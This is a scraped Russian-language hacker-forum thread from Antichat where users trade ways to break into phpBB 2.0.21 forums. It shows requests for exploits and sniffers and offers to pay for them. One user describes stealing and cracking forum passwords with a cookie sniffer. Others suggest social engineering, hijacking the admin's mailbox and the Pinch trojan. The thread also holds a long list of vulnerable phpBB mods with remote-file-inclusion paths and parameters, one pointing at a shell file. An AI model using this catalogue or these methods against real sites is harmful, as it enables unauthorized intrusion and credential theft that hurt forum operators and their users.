Форум АНТИЧАТ - Прости господа, но phpBB 2.0.21 что универсальна?!

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Прости господа, но phpBB 2.0.21 что универсальна?! (https://forum.antichat.xyz/showthread.php?t=27581)

Прости господа, но phpBB 2.0.21 что универсальна?!

Нет, вот не понимаю, что phpBB 2.0.21 невзломать?! Не уж-то phpBB 2.0.21 совсем не баговая? если я не прав кините эксплойты и сниферы сюда.

ща ..вон все кинулись кидать тебе всё ... да есть эксплойты, кто сам пишет, кто находит... но пока что они весьма актуальны потому тебе их никто не даст ... ну разве что за определённую сумму ...

Цитата:

Сообщение от r2d2

но пока что они весьма актуальны потому тебе их никто не даст ... ну разве что за определённую сумму ...

Ну дай что ли за определенную сумму =)

Цитата:

Сообщение от ettee

Пример:
http://someshit.net/showthread.php?t=16
ya.ru не отменяли

Эта весчь работает, но нужны права админа

Я получил 2 пароля от форума 2.0.21 кодом для версии 2.0.18. Пароли на сниффер пришли в MD5. Разшифровал и всё. Вот кукисы админа боюсь доставать, т.к. у него Опера, а Опера палит всю контору даже если [size=1] поставить.

Цитата:

Сообщение от -Bart-

Вот ты фантазёр =)))))

Хм... пароль я придумал и чудом подошло? Проверил с человеком, дак он поставил пароль "cscs", на снифер пришло - c071bd38e4c31ed73ec02faa32b52e4a .

Раз уж пошел флейм в этой теме, рассказывай -Bart- , что ты делал от начала до конца с подробностями. Как ты увел пароль в md5, про кукисы, про оперу, про снифер и т.д.

о_О Тоже самое, что и для 2.0.18. Думаю, врядли админам надо изменят приписку 2.0.18 на 2.0.21 => версия 2.0.21... Может я и не прав, но написал так, как всё было.

Извиняйте, но вроде версия не 2.0.21... Я уже ничего не понимаю... http://www.mxc.ru/forum

Всего лишь надпись на заборе....
Тут же есть темы, где написано, как определить версию форума

А без админского пароля на 2.0.21 ничего не сделаешь...
Все сплоиты и статьи на 21 версию заточены как раз на этот пароль. Не зная его, ничего не сделать. И даже за деньги :D

Как вариант, использовать уязвимости хаков. Например, Attachment mod...

Цитата:

Сообщение от Basurman

А без админского пароля на 2.0.21 ничего не сделаешь...
Все сплоиты и статьи на 21 версию заточены как раз на этот пароль. Не зная его, ничего не сделать. И даже за деньги :D

Это почему ж ничего не сделаешь? А СИ? А админский почтовый ящик? Если его знать, то можно попробовать получить к нему доступ. А пинч? Да и кроме того у phpbb полно модов дырявых к которым есть в паблике сплоиты. Можно и в этом направлении поработать

Цитата:

Сообщение от Basurman

Как вариант, использовать уязвимости хаков. Например, Attachment mod...

А в чём там уязвимость ? :confused:
Не кините ссылочку ? :)

Цитата:

Сообщение от Moscow

А в чём там уязвимость ? :confused:
Не кините ссылочку ? :)

Ссылочка есть только на уязвимость старой версии этого мода. Нет смысла ее кидать

Пратически по теме, у кого есть сплоит определения версии у пхпбб, я свой утерял... мож кто кинет, тока не киборга, так как он вроде не пахал....

Цитата:

Сообщение от Sn@k3

Версию phpbb можно определять только по косвенным признакам. Сплоиты которые ее определяли через docs/CHANGELOG.html бесполезны и даже могут дать неверную инфу. CHANGELOG.html - это не документ с собщением о версии данного форума. Это версия форума на момент установки, не более. Да и у нормальных админов этот документ удален

насчет уязвимостей хаков, модификаций пхпбб.. там чаще всего можно повстречать уязвимости типа удаленный инклуд, есть достаточно много эдвайзори и сплойтов по этой теме.. я, по сводкам багтрака и, просмотрев в свое время кучу сплоитов для модов пхпбб на милворме, составил этакий файлик уязвимых сценариев и пополняю его время от времени:

Код:

TopList Hack for PHPBB <= 1.3.8                /toplist.php?f=toplist_top10&phpbb_root_path=

Advanced GuestBook                        /admin/addentry.php?phpbb_root_path=

Knowledge Base Mod                        /includes/kb_constants.php?module_root_path=

phpBB auction mod                        /auction/auction_common.php?phpbb_root_path=

phpRaid <= 3.0.b3                        /[phpraidpath]/auth/auth.php?phpbb_root_path=                                                                        /[phpraidpath]/auth/auth_phpbb/phpbb_root_path=

                                        /[phpraidpath]/auth/auth.php?smf_root_path=

                                        /[phpraidpath]/auth/auth_SMF/smf_root_path=

PafileDB                                /[pdbpath]/includes/pafiledb_constants.php?module_root_path=

Foing <= 0.7.0                                /index.php?phpbb_root_path=

                                        /song.php?phpbb_root_path=

                                        /faq.php?phpbb_root_path=

                                        /list.php?phpbb_root_path=

                                        /gen_m3u.php?phpbb_root_path=

                                        /playlist.php?phpbb_root_path=

Activity MOD Plus                        /language/lang_english/lang_activity.php?phpbb_root_path=

Blend Portal <= 1.2.0                        /blend_data/blend_common.php?phpbb_root_path=

Minerva <= 2.0.8a                        /stat_modules/users_age/module.php?phpbb_root_path=

Minerva <= v238                                /admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=

FlashBB <= 1.1.5                        /phpbb/getmsg.php?phpbb_root_path=

HoRCMS <= 1.3.1                                /includes/functions_cms.php?phpbb_root_path=

mail2forum <= 1.2                        /m2f/m2f_phpbb204.php?m2f_root_path=

                                        /m2f/m2f_forum.php?m2f_root_path=

                                        /m2f/m2f_mailinglist.php?m2f_root_path=

                                        /m2f/m2f_cron.php?m2f_root_path=

WoW Roster                                /[roster_path]/lib/phpbb.php?subdir=

Integramod Portal                        /includes/functions_mod_user.php?phpbb_root_path=

                                        /includes/functions.php?phpbb_root_path=

Shadow Premod <= 2.7.1                        /includes/functions_portal.php?phpbb_root_path=                                

phpBB XS <= 0.58                        /includes/functions_kb.php?phpbb_root_path=

                                        /includes/bbcb_mg.php?phpbb_root_path=

                                        /includes/functions.php?phpbb_root_path=

pnphpbb                                        /includes/functions_admin.php?phpbb_root_path=

Admin Topic Action Logging                /admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=

phpBB Static Topics <= 1.0                /includes/functions_static_topics.php?phpbb_root_path=

Security Suite IP Logger                /includes/logger_engine.php?phpbb_root_path=

Dimension of phpBB                        /includes/themen_portal_mitte.php?phpbb_root_path=

                                        /includes/logger_engine.php?phpbb_root_path=

                                        /includes/functions.php?phpbb_root_path=

phpBB User Viewed Posts Tracker                /includes/functions_user_viewed_posts.php?phpbb_root_path=

phpBB RANDOm USER REGISTRATION NUMBER        /includes/functions_num_image.php?phpbb_root_path=

phpBB insert user <= 0.1.2                /includes/functions_mod_user.php?phpbb_root_path=

phpBB Import Tools Mod <= 0.1.4                /includes/functions_mod_user.php?phpbb_root_path=

phpBB Ajax Shoutbox <= 0.0.5                /shoutbox.php?phpbb_root_path=

SpamBlockerMOD <= 1.0.2                        /root/includes/antispam.php?phpbb_root_path=

phpBB PlusXL 2.x <= biuld 272                /mods/iai/includes/constants.php?phpbb_root_path=

AMAZONIA MOD                                /zufallscodepart.php?phpbb_root_path=

news defilante horizontale <= 4.1.1        /franзais/root/includes/functions_newshr.php?phpbb_root_path=

phpBB lat2cyr <= 1.0.1                        /lat2cyr.php?phpbb_root_path=

SpamOborona PHPBB Plugin                /admin/admin_spam.php?phpbb_root_path=

RPG Events 1.0.0                        /functions_rpg_events.php?phpbb_root_path=

phpBB archive for search engines        /includes/archive/archive_topic.php?phpbb_root_path=

PhpBB Prillian French                        /language/lang_french/lang_prillian_faq.php?phpbb_root_path=

phpBB ACP User Registration Mod 1.00        /includes/functions_mod_user.php?phpbb_root_path=

phpBB Security <= 1.0.1                        /phpbb_security.php?phpbb_root_path=

phpBBFM version 206-3-3                        /language/lang_english/lang_prillian_faq.php?phpbb_root_path=

Fully Modded phpBB 2                        /faq.php?foing_root_path=sh3ll.txt?

                                        /index.php?foing_root_path=

                                        /list.php?foing_root_path=

                                        /login.php?foing_root_path=

                                        /playlist.php?foing_root_path=

                                        /song.php?foing_root_path=

                                        /gen_m3u.php?foing_root_path=

                                        /view_artist.php?foing_root_path=

                                        /view_song.php?foing_root_path=

                                        /login.php?foing_root_path=

                                        /playlist.php?foing_root_path=

                                        /song.php?foing_root_path=

                                        /flash/set_na.php?foing_root_path=

                                        /flash/initialise.php?foing_root_path=

                                        /flash/get_song.php?foing_root_path=

                                        /includes/common.php?foing_root_path=

                                        /admin/nav.php?foing_root_path=

                                        /admin/main.php?foing_root_path=

                                        /admin/list_artists.php?foing_root_path=

                                        /admin/index.php?foing_root_path=

                                        /admin/genres.php?foing_root_path=

                                        /admin/edit_artist.php?foing_root_path=

                                        /admin/edit_album.php?foing_root_path=

                                        /admin/config.php?foing_root_path=

                                        /admin/admin_status.php?foing_root_path=

Spider Friendly <= 1.3.10                /admin/modules_data.php?phpbb_root_path=

не знаю, мож кому пригодится, мне такие инклуды всего пару раз помогли..

Цитата:

Сообщение от syntacsis

гыгыгы веселый парень, хз я это знал, мне требуется сплоит, хотя он вроде тем же тыком работает, прсот охочется автоматизировать, да прятнее работать в ком строке

Цитата:

Сообщение от Sn@k3

Ну то что ты знал это хорошо, а обычно это самая частая ошибка
Вот за списочек спасибо. Очень не помешает

Цитата:

Сообщение от syntacsis

Это почему ж ничего не сделаешь? А СИ? А админский почтовый ящик? Если его знать, то можно попробовать получить к нему доступ. А пинч?

Ну это все косвенно... Я имел ввиду, что средствами форума это не сделать без пароля... Можно ж поломать хостера до кучи :) Упадут сразу все форумы

Цитата:

Сообщение от syntacsis

Да и кроме того у phpbb полно модов дырявых к которым есть в паблике сплоиты. Можно и в этом направлении поработать

Я это и писал. Если еще актуально: _http://www.securitylab.ru/vulnerability/273545.php
2.4.5 в середине сентября вышел. Сейчас проект закрыт...

Цитата:

Сообщение от ettee

Пример:
http://someshit.net/showthread.php?t=16
ya.ru не отменяли

Ой! Что и правда работает? :D